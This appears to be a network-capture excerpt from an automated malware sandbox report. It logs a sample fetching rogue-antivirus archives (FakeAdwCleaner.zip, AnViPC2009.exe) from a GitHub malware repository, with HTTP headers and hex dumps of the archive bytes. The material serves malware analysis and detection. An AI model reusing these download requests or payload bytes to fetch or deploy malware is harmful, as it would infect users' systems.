                                                                                                        2022-09-29 12:46:21 UTC11602INData Raw: 88 3f be 73 06 e3 66 9c 16 42 19 ef 3a 84 ca 51 90 7b 4e 3f 76 64 5f 49 6a db 1a 72 6b 9b ac 08 13 fd 69 39 41 1b e4 b9 0c 57 01 2f 68 9e 9e 65 2c 49 b9 e7 03 e5 7e 4e 5f 06 ba e8 7a 95 c0 b1 15 75 83 3a a7 95 86 72 67 27 bf 84 46 7d c2 06 8a 9d 02 c8 d5 82 1b 54 f3 2a 90 8a 8d e0 60 04 56 d8 74 eb 6a e8 b9 1b 80 9e 18 5e 90 87 63 ad 90 48 e2 18 71 fc b7 b5 4c 94 ee e5 89 6c e9 15 69 35 cc b6 2c 9e 99 3b e9 13 dc a6 40 d5 fe b5 20 53 d4 a5 46 bd 05 bb f0 1d 9c 36 a7 80 fd d8 9b e3 9b eb 2b 60 6a c0 78 be 44 bd f5 3c b2 1d b8 6e 23 c3 cd cc e4 f7 21 87 24 9f f9 8a b3 28 21 84 70 a3 a1 ba 07 99 48 8a 7e 97 fc 34 67 1f f1 5c 41 80 b6 37 c5 4f b2 ee 16 98 6a 35 c8 2d 89 4a 1e 31 f2 58 a6 94 43 a9 b3 dd 57 19 b2 66 5e 5d 82 13 8a 4c c6 7a 69 87 a8 5e 82 7e b5
                                                                                                        Data Ascii: ?sfB:Q{N?vd_Ijrki9AW/he,I~N_zu:rg'F}T*`Vtj^cHqLli5,;@ SF6+`jxD<n#!$(!pH~4g\A7Oj5-J1XCWf^]Lzi^~
                                                                                                        2022-09-29 12:46:21 UTC11618INData Raw: 92 5d 0d 92 8a 12 b0 80 2c df 3e 36 64 5d cf 63 43 2a 1e ce 5a 21 0b 44 b7 b4 75 dd 21 de 1c ed 1c 11 5f 0b 22 af 78 54 21 6d 54 89 5b b5 00 12 a6 f1 db 16 7a 37 e0 6a 58 01 be 39 38 6a 72 ae 80 d8 63 86 89 fa c4 d6 96 56 c7 9a e0 bf e9 44 6b c3 4b f7 02 47 3a 46 6e a3 96 de f6 06 56 b1 6f e8 c3 29 13 8b 21 a2 8b 4b 6f 77 1c d5 b0 44 1a 75 92 c2 3c 75 7d 93 73 1a 8b dd dd 1c 0e af 66 0f ab 76 ca 06 d2 59 aa 26 f4 34 61 7e e4 1a a4 c6 73 7c d0 c0 f2 d3 60 b5 ab b5 99 d9 1d 1e 29 27 05 fd 6f 2f 12 f8 c6 b9 d3 cc 4d 0f 8e d9 70 9a 8d be 1e 7e 0b 20 0d b1 d3 a8 9d 9f 96 e1 29 55 c9 a0 cc c7 21 35 7c 28 38 a2 8b 24 7e ab ac f1 0e a3 9a 1d 54 bb ea 2e 2e 56 77 24 18 b1 85 f3 6b 07 e3 49 c5 45 ff f1 6b 65 06 b2 46 a2 14 8d a5 bc cb a2 8b f4 30 1e ef 3c 96 95 57
                                                                                                        Data Ascii: ],>6d]cC*Z!Du!_"xT!mT[z7jX98jrcVDkKG:FnVo)!KowDu<u}sfvY&4a~s|`)'o/Mp~ )U!5|(8$~T..Vw$kIEkeF0<W
                                                                                                        2022-09-29 12:46:21 UTC11634INData Raw: 66 e4 e0 e8 35 29 de f7 45 5f ce fa 9b 11 4a bc 99 85 aa 38 16 ba 31 6a bd ef 50 4b 01 02 3f 00 33 00 01 00 63 00 c3 5c f5 3c 00 00 00 00 58 fa 11 00 5a bb 12 00 19 00 2f 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 56 69 50 43 32 30 30 39 2e 65 78 65 0a 00 20 00 00 00 00 00 01 00 18 00 00 eb 28 0a b0 28 cb 01 6b b5 77 4b bb 46 d4 01 6b b5 77 4b bb 46 d4 01 01 99 07 00 02 00 41 45 03 08 00 50 4b 05 06 00 00 00 00 01 00 01 00 76 00 00 00 9a fa 11 00 00 00
                                                                                                        Data Ascii: f5)E_J81jPK?3c\<XZ/ Endermanch@AnViPC2009.exe ((kwKFkwKFAEPKv


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        36192.168.2.449782140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:24 UTC11634OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:24 UTC11634INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:46:24 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:24 UTC11635INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        37192.168.2.449783185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:24 UTC11637OUTGET /Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:46:24 UTC11637INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 179477
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "38494344cdf51b86edbe1f76bf6911f46b9347e73d9f681d6b5db320a0b3f14c"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 0807:AB6C:283C1A:2CD1B7:63359351
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:46:24 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6971-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455585.594234,VS0,VE1
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: 168cd923fc603a01324d55ef9daf8e928c10ca6a
                                                                                                        Expires: Thu, 29 Sep 2022 12:51:24 GMT
                                                                                                        Source-Age: 79
                                                                                                        2022-09-29 12:46:24 UTC11638INData Raw: 50 4b 03 04 14 00 01 00 08 00 86 96 4d 46 d7 12 44 12 55 bc 02 00 48 fb 02 00 1d 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 46 61 6b 65 41 64 77 43 6c 65 61 6e 65 72 2e 65 78 65 8e 63 4d 32 e6 4e f1 06 d8 1d 2c 5b 55 6f 80 61 1d 89 c5 b9 23 17 4d c1 5d 39 28 9a 83 78 47 ee 2b b5 07 8d 3b d4 30 bd 6f 54 91 12 19 11 4c a9 f2 16 dd bf 38 2c 19 f9 23 af 82 53 4b f1 f8 80 6e f2 b4 22 67 da 4e 10 9b 5b 94 a7 03 15 5b 09 c4 b3 c7 d1 e4 ed 99 13 12 6c 94 b1 03 46 99 d6 66 20 52 49 0c 59 e7 3b 2e b9 b9 0e bc 4c 3e d8 15 6f 62 84 e0 96 7f 00 cc 6b 3d 98 16 92 50 73 fa 6d b9 60 24 13 1e 11 97 fa 5d 35 5a 94 46 f2 53 dc 7f b9 2e 13 e0 5c e7 b5 66 43 0a 6b f2 de 9c b6 63 70 8f 94 7b 83 60 80 8e ea b5 75 ea cb f9 d1 3a d9 23 6a 17 21 e8 64 dc 6d c2 46 56 04 a8 ad ca f4
                                                                                                        Data Ascii: PKMFDUHEndermanch@FakeAdwCleaner.execM2N,[Uoa#M]9(xG+;0oTL8,#SKn"gN[[lFf RIY;.L>obk=Psm`$]5ZFS.\fCkcp{`u:#j!dmFV
                                                                                                        2022-09-29 12:46:24 UTC11639INData Raw: d9 c0 2d 87 2d 75 b8 41 8b 73 ae 90 fa 4e 15 0d 9e 82 b6 25 20 ea 4c 2b d6 fc 21 48 89 1a 1d 5d 4f 7f c4 94 cc 8f f2 1d 11 8c 3e 6c 50 02 22 1b 21 cf 6c cc 13 c3 08 6a 0d 41 4d 74 ed 83 22 3f 71 d4 70 48 dc 09 d7 3b 01 2b 5e c0 f0 47 26 c3 b9 42 14 a4 54 01 4c 7c f9 a9 43 5d 14 36 85 be 2b 17 47 f2 1c d5 6b d8 8a 0f cd f1 e9 88 c6 a1 69 6d 54 6d 42 d1 5c 15 9e aa 71 d8 27 76 24 a2 02 85 cc a2 13 40 62 2d 50 b7 d3 8d 81 06 68 e6 7e e2 12 f9 37 64 cb 42 3f cc 14 56 aa cc d7 e9 46 15 d8 0e 65 3a 3f bc 47 c4 bd 0c c5 f8 6e 27 66 d5 aa e3 c3 ee 40 93 50 c5 e4 e1 af a0 30 21 7b 5b fb f4 ab 50 2c 8f 6d a8 c6 24 66 86 bc bd 85 67 38 92 03 c2 fb 3d a2 1e a6 f2 4a 3c 4f f7 17 28 f2 c6 b1 90 18 95 64 3a f9 1f cf 5b cf e6 01 f2 6d ab 94 ee 7b 62 90 d0 15 43 fc b8 be
                                                                                                        Data Ascii: --uAsN% L+!H]O>lP"!ljAMt"?qpH;+^G&BTL|C]6+GkimTmB\q'v$@b-Ph~7dB?VFe:?Gn'f@P0!{[P,m$fg8=J<O(d:[m{bC
                                                                                                        2022-09-29 12:46:24 UTC11640INData Raw: 94 36 4b 45 7b 96 2c 36 f4 82 2c ad 50 9d 78 e6 1e 6d 32 7a ed da 10 0f 7a db 65 f9 35 0c df ca 06 b9 e7 82 e8 2d 74 fa 17 9c 2e b2 9d fc bb 71 37 ca 81 64 cc 20 6f 9c b6 c9 9f 9f 6f 28 5e 0a 69 66 00 b3 68 63 7e 5f ae b0 f8 71 e1 ca 42 1c 7c cc 51 8f 3f c1 21 bd c0 8f b2 a3 f5 16 b1 0a b3 62 99 6b 3c 5b c0 7e ec ab c6 ba 59 e5 a1 db c2 41 a3 23 99 0c 44 4c 97 c1 13 c1 8f 9f e3 c1 65 57 54 2d 17 6d e2 59 7c 9a e5 a4 0c 0b 1c ea 8d 64 6d a9 e7 4f 70 e3 64 07 1c 6e c8 64 c1 75 03 8e d4 a7 85 ce a7 dc b3 42 6e 34 ac d5 dc b0 35 28 ac 78 bf 02 30 dc fb c4 e6 1a ea 8b e0 dc f3 2a a6 c0 b7 33 7e c9 25 44 9b bd df cb 39 f9 6d f7 6b 7d e2 af ed 52 36 26 fb ad b8 29 e0 b7 3a 66 93 02 3b 06 34 d2 c8 75 0b 39 4c 9b 41 87 4d e0 81 3e 74 aa ad eb 22 cd 1f 50 52 3c 25
                                                                                                        Data Ascii: 6KE{,6,Pxm2zze5-t.q7d oo(^ifhc~_qB|Q?!bk<[~YA#DLeWT-mY|dmOpdnduBn45(x0*3~%D9mk}R6&):f;4u9LAM>t"PR<%
                                                                                                        2022-09-29 12:46:24 UTC11642INData Raw: e3 90 37 b3 60 f1 e5 e2 72 e4 7a ec 3b a5 04 21 f2 c0 a8 80 e3 0b 27 44 db fe 94 f4 95 9a 77 0c 9a b4 47 71 6f aa fa 55 4e fb 54 48 63 42 ad 7e de 33 8d e9 b7 af 19 19 9f e5 33 16 c0 14 d8 aa ef 10 d9 b8 63 b9 4c b0 c0 27 be fd 1c 56 35 5c 3b 53 3c 60 e7 19 a0 43 3a 45 a5 83 d6 23 90 17 bf 9f c5 43 5b fd 1e a9 d2 07 38 8c 4b b2 09 b5 0a 29 7f f4 83 cf 82 eb 8b ff fd b9 d6 87 ed c7 f9 cd c5 4d f1 0e 28 3e aa 73 ef 77 9c 22 0b 36 81 f5 f5 57 12 d6 63 32 75 ae af 35 cb f7 9d 3b fb 26 ef 0f fe f1 a3 53 c5 c4 6d dc 2f a2 9a 5d f6 1a 6c d4 b9 c5 08 14 21 9b 55 58 49 32 03 f8 cd e2 21 37 2e a4 3f a4 b5 04 ee 68 34 08 83 ca 9f 9d 57 40 3b e5 61 5c 2c 3f 3f 90 22 75 c9 eb db 89 f4 fb ab 7c 7e ad 9a c6 46 4c 91 aa 9c 82 cd 7e 8f 99 5b 42 ef 2f ec ed 8e 8f 93 dd 2a
                                                                                                        Data Ascii: 7`rz;!'DwGqoUNTHcB~33cL'V5\;S<`C:E#C[8K)M(>sw"6Wc2u5;&Sm/]l!UXI2!7.?h4W@;a\,??"u|~FL~[B/*
                                                                                                        2022-09-29 12:46:24 UTC11643INData Raw: 39 6d 81 20 c2 2b 16 52 80 a8 dd 26 77 b2 58 3c 42 1d dc e5 a4 02 9f 4f 8b c7 cf 66 7e 2a 86 36 2f 12 c6 e3 88 7b 88 cc 75 6e 12 f0 a3 fd 68 de 49 cf 91 50 5f c5 ba be b8 19 21 95 e4 8d 03 61 2a 8e 98 ef 13 b8 55 67 59 db 87 07 88 ce 79 50 82 2e 40 7f 49 7a 34 30 db 6d ad be 77 60 53 1c 53 66 52 81 3e 1f e4 3e 96 e0 b7 6e f2 9a 1f db fa 76 be 89 92 0a d5 5b a9 b3 fc 04 36 9a 6c 8a 8d eb 72 3b 42 3b af 23 90 48 c9 3d e7 a0 c1 75 81 cc 26 4d 5c 0a db c7 bf f2 f5 6b 34 a7 b9 04 e1 0e 06 c5 90 f7 0f dd 87 6c bc 04 56 33 c9 a5 c2 9f 54 68 d9 f5 51 86 3d 06 2c 9c bb a1 b2 bd 5d b0 6a a0 88 c1 ad 3d 23 4e 2e d0 8b b4 92 3d dd 63 45 a2 d6 c5 a3 e0 cf 8f 15 30 73 92 05 3a f2 a0 67 a4 f7 b7 b5 d6 1d 76 89 ab 4b 50 34 2c f0 65 da 1f e1 31 a9 be 51 2c 6c e7 93 45 16
                                                                                                        Data Ascii: 9m +R&wX<BOf~*6/{unhIP_!a*UgYyP.@Iz40mw`SSfR>>nv[6lr;B;#H=u&M\k4lV3ThQ=,]j=#N.=cE0s:gvKP4,e1Q,lE
                                                                                                        2022-09-29 12:46:24 UTC11644INData Raw: 5c 27 3a 90 13 8a a8 18 fa 8e c3 16 3a c2 cc 3b b9 c5 ba 3f 94 5e 39 60 77 d2 16 81 b0 ad 06 96 0d 19 0b bd 2d 2e c6 d7 ec 99 41 a3 b0 ce 99 d0 23 56 a5 c8 63 13 4e 68 32 bc 83 5d 50 37 5f 2b cf 27 60 90 e1 69 4c ce fe 76 ca 9a 5c bc 94 71 f9 c7 ee fc 15 32 64 94 67 42 30 c9 8d 88 bf d8 0c 6f e3 5f 33 d1 7e 50 53 2c 83 34 de cf 87 f4 ca 5d c8 45 e4 d9 ba 5e f8 24 70 9c 1b 8e e4 0e e6 4f e9 9f db 9e 61 a7 1c 9b 48 09 fa 6f 36 c6 de 68 d9 01 61 fa de 0a d8 d9 f5 42 18 69 c9 6e f5 45 5f fd 72 34 d5 c8 f5 c8 58 98 c5 1f d5 82 92 85 09 f8 ce e6 d4 c4 82 56 b9 4f 3d 01 d8 aa 60 06 08 6d db a6 61 44 8f 61 60 6b 56 2b 98 9e 24 47 91 8d 47 3c bd 88 35 22 e0 9b 2c 43 72 ec eb 01 c5 af 6f 10 84 a1 fd 0f e1 5e 65 43 66 59 11 da 70 75 42 ea 22 a3 a4 5f fd 65 52 02 23
                                                                                                        Data Ascii: \'::;?^9`w-.A#VcNh2]P7_+'`iLv\q2dgB0o_3~PS,4]E^$pOaHo6haBinE_r4XVO=`maDa`kV+$GG<5",Cro^eCfYpuB"_eR#
                                                                                                        2022-09-29 12:46:24 UTC11646INData Raw: 4f ee 57 80 3a 53 0c 54 62 9c de 2b 08 77 ac 72 d6 a5 48 60 9a 5f e0 a9 a0 34 89 7c ab e2 ea fc c7 36 09 a4 30 67 72 7e af 23 12 82 8a 9a e1 c3 a9 0d 3c 8c b5 4b 8c 52 b6 7f 20 4e df 85 13 6b a2 4e 47 d5 99 09 b1 66 22 17 a1 98 87 d7 6d ee 0d c2 18 55 50 b9 e0 56 c3 12 f0 6a a2 9f 34 e5 43 aa 30 bf f1 d1 0c 79 0e 70 14 13 35 33 8b 4c 57 1a c5 e9 7d 22 d3 f1 7e 07 c1 f6 7f ba 25 a5 42 53 36 97 59 a6 e9 e9 08 22 ef a6 61 2b 6a b5 60 29 af 32 1d ae 9e 67 ac 2e 74 15 f0 a4 cc 61 5f 04 7b cf cb 8d bd ce cb 99 01 b8 52 e6 7a 55 6c dc dc 5e b7 79 a2 14 01 c7 fc 87 b0 fe 3f e8 a2 6a fe be 38 ff 1d e0 98 66 58 a1 ca 3b 2f 78 4b 54 88 4e 8b d1 72 de 00 d4 40 fa 40 a6 a4 5e 9e 07 df bd f0 f3 93 ae 1e df 7e c7 b4 f7 23 aa 0b 09 5f ad 8f 87 9a 7c 3b 6a 3d b2 20 56 c4
                                                                                                        Data Ascii: OW:STb+wrH`_4|60gr~#<KR NkNGf"mUPVj4C0yp53LW}"~%BS6Y"a+j`)2g.ta_{RzUl^y?j8fX;/xKTNr@@^~#_|;j= V
                                                                                                        2022-09-29 12:46:24 UTC11647INData Raw: d4 0e 9e 60 8f 34 40 bf 51 56 4b 40 ce f7 ad ae b1 d4 d6 67 9f aa a0 29 41 a2 7a c4 32 80 d1 b2 ea 69 87 b2 34 e5 90 a6 b6 7f df 53 70 1e 1b 0f 55 cd af b6 26 b1 45 77 07 9a 81 11 a5 a3 7f 50 57 2a 5c e5 ab 71 a4 6e ac d6 77 8f c1 b7 b0 5e c6 1e da 60 e3 00 ab 0a fa 8e 81 86 e9 35 a0 0d aa 21 a6 64 de 06 ae 0a e5 53 a1 b5 28 d0 0c 0b fc 68 57 45 1a f6 a3 78 b8 4f 5f 27 c2 ad 41 32 5b 04 ba 30 41 da 5a 77 30 b1 a0 00 0c c9 57 3b d7 1a 3a 24 a4 2f 5c 16 17 7e bf e4 14 84 b8 0d f9 25 70 32 ae d9 66 87 71 0f f0 f9 43 5c b3 f3 aa df b6 7a 00 76 5d eb 15 c9 d0 bc 65 14 02 53 f0 1b 56 e7 5e 3c 64 25 c9 c6 dd 35 c8 93 7c b9 f5 49 28 12 ed 80 2e b6 df cb c6 78 a6 8f bf 69 20 af eb 3b 8b d6 b6 19 83 a0 91 64 ac 77 d6 1a 7c fb 1e 3c b6 65 75 2f e3 6d 35 66 c3 0e fb
                                                                                                        Data Ascii: `4@QVK@g)Az2i4SpU&EwPW*\qnw^`5!dS(hWExO_'A2[0AZw0W;:$/\~%p2fqC\zv]eSV^<d%5|I(.xi ;dw|<eu/m5f
                                                                                                        2022-09-29 12:46:24 UTC11649INData Raw: a9 49 a9 bb 74 02 f1 67 5b b4 4e b8 60 21 ad 9b 8e 8a 25 5b 04 92 d3 27 83 04 89 16 10 7f 05 1e 87 7f 94 76 08 90 09 18 f7 2d 25 0b 5a 7c 84 3e 1e 3d c3 01 90 c6 78 b3 94 42 a8 77 3b 50 2d 20 91 a3 e7 5f 8a c0 c4 e2 a3 52 b3 66 4f d2 fe 83 2d 48 f2 24 7b 83 4a d6 34 87 ed 15 08 b3 e3 a9 b7 7e 0f 4f ae a6 76 58 2b d4 48 86 c0 ee 3a 22 1a c7 28 bf b3 fd 9e cc 7d a3 3c 7f 0c 50 a9 55 e5 1e bb 08 6b c9 4f 57 04 b6 ad a5 df b8 f9 6f 7b 9d 22 c1 47 b6 23 1b 12 c0 bb c0 84 9a a0 56 4f 76 53 ae 37 6c f8 27 aa b9 c5 c2 70 7d e2 1a 40 98 de a6 fd 33 fd f5 b1 74 21 dd 02 b6 16 c0 b8 19 32 0f fc 73 fb b4 be ee 1e 37 99 42 ef a2 90 99 ce 6c de 70 50 37 cd e6 e7 dd bc fd b6 0d d2 9f 69 0c 38 5a fb b5 4c 06 b8 fb a2 ba 40 49 2b f5 64 7d 6f 9b f5 7d 98 e2 95 fd ee 29 db
                                                                                                        Data Ascii: Itg[N`!%['v-%Z|>=xBw;P- _RfO-H${J4~OvX+H:"(}<PUkOWo{"G#VOvS7l'p}@3t!2s7BlpP7i8ZL@I+d}o})
                                                                                                        2022-09-29 12:46:24 UTC11650INData Raw: 5d 47 e1 31 b6 1d 16 83 76 db ad 7e 65 4d b4 ec 37 d1 a4 cd 7b d1 8e 97 3f fd b8 1e 43 32 6e 74 6f 7e da 03 4b 4b b1 1c 4f 8c 72 87 fd ba 69 10 e9 ee 61 1e 9b f5 1d df c0 9e 18 9e 13 a4 8c 3c 78 90 4a 87 71 07 ac 91 bf 69 32 8e 97 43 82 18 20 d9 29 71 ae 97 81 80 8b e1 10 1a 16 d1 4c f3 9c 12 d3 5e 63 51 43 c4 ef dd 05 7d 54 ae b8 f7 04 f6 a2 46 43 07 d8 fa ed 75 9c 6b bf e2 99 6f 1b 4a 90 90 9f 24 95 9b fb 79 e5 e2 b2 32 67 27 35 fd 14 06 2c 27 3b 87 68 2c ed 63 c2 c8 05 75 ae cc 67 bb da cb 3c 1c e1 d7 74 7b de c3 b1 85 c6 88 56 d3 30 45 db 9b 79 ce 7d 6b c5 a8 e4 f0 6a f0 f8 9f e6 4e e7 35 5e a7 44 a4 4b 24 7a 55 79 17 f4 90 ad 05 a5 70 b7 64 d1 ee 4c 4f 56 47 c7 68 38 9d 02 61 89 ec 8a a7 7e 4a 63 ba 93 40 ab 5c 71 1a c9 9a 79 de f4 8a 4a 32 39 ab 5f
                                                                                                        Data Ascii: ]G1v~eM7{?C2nto~KKOria<xJqi2C )qL^cQC}TFCukoJ$y2g'5,';h,cug<t{V0Ey}kjN5^DK$zUypdLOVGh8a~Jc@\qyJ29_
                                                                                                        2022-09-29 12:46:24 UTC11651INData Raw: 4d 4e 8e ff 39 9d 8d fe 11 12 64 ae 0c 1a f8 cb 86 ee 36 7a 1a dc a8 6f ea 81 0d d6 43 61 b3 af 0a 58 a5 7e 3b 1e 92 c2 e2 54 51 38 c9 f3 7e 0e 6c 2a 6d 32 4e 0c 42 dd 85 9d 7e f4 0e d8 3c fa 84 2e 7d cf cc c1 6f 14 66 3c 3d d5 27 29 d0 ae a0 4e 52 39 3b 09 a1 43 07 c4 de 67 b7 ac b6 fd 53 ce 96 26 9d 8b 10 90 1f a4 46 45 50 4b 7a 69 32 4d b1 57 ec 26 c0 4f 63 1c b9 a1 44 aa 6f 8f f2 01 dc 63 84 52 4c 8c ee e2 07 2f bf 88 1d c7 87 75 80 7b a8 1e 82 9b 1f 13 20 10 4f e9 8a 10 d8 81 58 f7 46 39 d3 69 3e b7 ce d6 83 2d 65 9b 84 91 69 30 27 a7 e3 c7 80 ba 38 d7 51 cb a5 dd f6 b3 c9 23 81 60 46 c2 71 f2 27 6f 2f f7 93 30 cf 91 78 34 f6 da fe 0a 3e d0 c4 4d 74 c2 2d cf 65 2c db b9 ab 7c 92 ea c7 b7 37 85 92 25 62 52 45 49 9b f9 4c 87 57 c9 6d 80 45 d7 5e 30 c3
                                                                                                        Data Ascii: MN9d6zoCaX~;TQ8~l*m2NB~<.}of<=')NR9;CgS&FEPKzi2MW&OcDocRL/u{ OXF9i>-ei0'8Q#`Fq'o/0x4>Mt-e,|7%bREILWmE^0
                                                                                                        2022-09-29 12:46:24 UTC11653INData Raw: b0 4d 49 eb e1 1a a2 38 6d 32 ca 4c dd bc 44 6d 9d 98 f1 5d 22 cd 00 8c c3 ba ea 34 67 9a 00 30 cc 2f cf 04 a5 6f aa b6 e7 89 d8 40 34 92 32 83 66 c5 f8 e4 e5 d8 6d 23 dd fd bc 08 4e e7 1d d5 08 04 44 b0 9b 93 41 af 35 26 01 7b a3 a9 d3 9b 94 14 e8 06 ec 58 81 dd d5 33 ba 1b 04 ba 59 50 f0 bb 81 d6 68 9d f9 ad f8 ed 13 f1 3b 0b 17 ca cb 9f 55 13 2d 20 c1 d4 9b 32 27 bc 9d 2c 20 96 7f 14 a3 8e 00 90 fe ba 18 ce d5 4a 34 0d b7 de 3a 71 c3 19 48 8f 1e 74 87 ba 38 48 8b 6e b4 49 4d 78 9e 5f 79 d5 80 b4 1a 9f 19 ef 7d c6 d1 3c e5 16 64 cb 9a e9 2e ec 3a f6 ba 72 09 3e 09 1b 33 6c c9 ff 5a 82 ae 61 7a 85 a7 0c 71 d1 59 8c a9 41 b9 8b 32 16 15 0a 51 fe f5 8f 72 da 04 41 cc 35 04 f1 51 64 32 05 ff e5 2a 6c f0 5e 0b 91 ac 74 c9 de 2e 34 0d 6c 54 7b 03 fb 8d 6b de
                                                                                                        Data Ascii: MI8m2LDm]"4g0/o@42fm#NDA5&{X3YPh;U- 2', J4:qHt8HnIMx_y}<d.:r>3lZazqYA2QrA5Qd2*l^t.4lT{k
                                                                                                        2022-09-29 12:46:24 UTC11653INData Raw: 1d b3 34 a5 dc 77 39 6a 96 10 ed eb d4 28 09 a3 e1 b5 b1 5c 73 ff e3 4e 0f a9 0b 02 80 35 5f 25 0d 7a 64 08 55 70 aa 1b ca d4 90 05 41 60 a9 dc 23 04 03 7d b1 bd 10 63 c9 6b 81 3f 99 20 0a b3 ef f9 08 43 b5 04 dc c5 96 f4 26 ba 8b 68 72 bc dc 8e ae a7 58 e2 fd 03 ca ab 6e 3d 2a c0 86 97 3e f2 aa ab c2 e1 2e 59 07 8c 7f f6 22 0d 54 1c 26 56 7d bc 7a 87 7e 21 31 91 84 06 44 18 e1 ac d4 35 7a 29 d3 92 24 77 a9 ee 29 3a 37 54 8f 8a 6a 6a c3 4b e7 7d 7d bc 47 86 5a 5f bb 98 ab dc bb 87 1f 54 82 36 b5 d3 7e 12 64 f6 32 aa 5a 20 75 5b ec 5b 43 8b 7c 35 63 a6 1f 52 fa 1a b1 fe 9b dc ce e8 c1 cb a8 57 9f a3 c7 5c e6 15 de 84 9e 19 b9 39 e3 17 7f 7a 1f 7f a3 96 77 e3 eb ab 98 c3 6d f6 72 a9 2b 3b 4c e3 6f 0b 01 62 12 5d 75 9e a5 95 79 5c 9c f4 42 6a d5 95 1f 81 ba
                                                                                                        Data Ascii: 4w9j(\sN5_%zdUpA`#}ck? C&hrXn=*>.Y"T&V}z~!1D5z)$w):7TjjK}}GZ_T6~d2Z u[[C|5cRW\9zwmr+;Lob]uy\Bj
                                                                                                        2022-09-29 12:46:24 UTC11669INData Raw: d0 e0 95 0e e5 68 05 0c 23 8c 34 ba 6f c9 95 c2 bb a7 40 90 5d b5 9f 12 df ff af 40 19 8d 39 5f 00 ea a3 61 32 40 27 80 f4 1d 8d b3 f7 2e da 6a 31 be 50 1b f8 c1 70 28 57 af 64 a3 8e 7c 27 a3 ee 81 18 93 ac 00 6c 10 e7 03 fa 8d cf 22 3b a1 7e 4a 63 fb 96 30 05 96 75 93 82 96 3a 47 a4 7f 03 30 58 22 56 3d 50 cf d5 51 b9 28 53 ec c7 f7 06 ef 94 cf 63 7f 3d 83 a3 a8 b8 87 11 be 3c 1d 18 cb a4 2a c0 9b 71 2a dd 89 a8 eb f2 d7 d0 c7 04 c7 cf 67 55 ee ee cc 80 77 72 6e 03 d0 90 b5 cb c0 28 54 67 d6 c8 8a a4 e9 9d 98 e6 46 be 6c f8 1e 9b e7 7e 2b 04 b6 13 67 8e 1d 0e 7f fa 3c 01 c4 6e 32 91 a5 2c 64 3b f9 f7 ed 7b 51 65 e2 39 84 e6 8a 0a be 2e f5 e3 df ba f5 a5 70 13 f4 fc 8e 38 3e fa c2 9f 51 32 3c bb 69 e4 6a 61 13 80 b1 83 0f 41 bb dc 09 13 c5 eb 36 51 45 69
                                                                                                        Data Ascii: h#4o@]@9_a2@'.j1Pp(Wd|'l";~Jc0u:G0X"V=PQ(Sc=<*q*gUwrn(TgFl~+g<n2,d;{Qe9.p8>Q2<ijaA6QEi
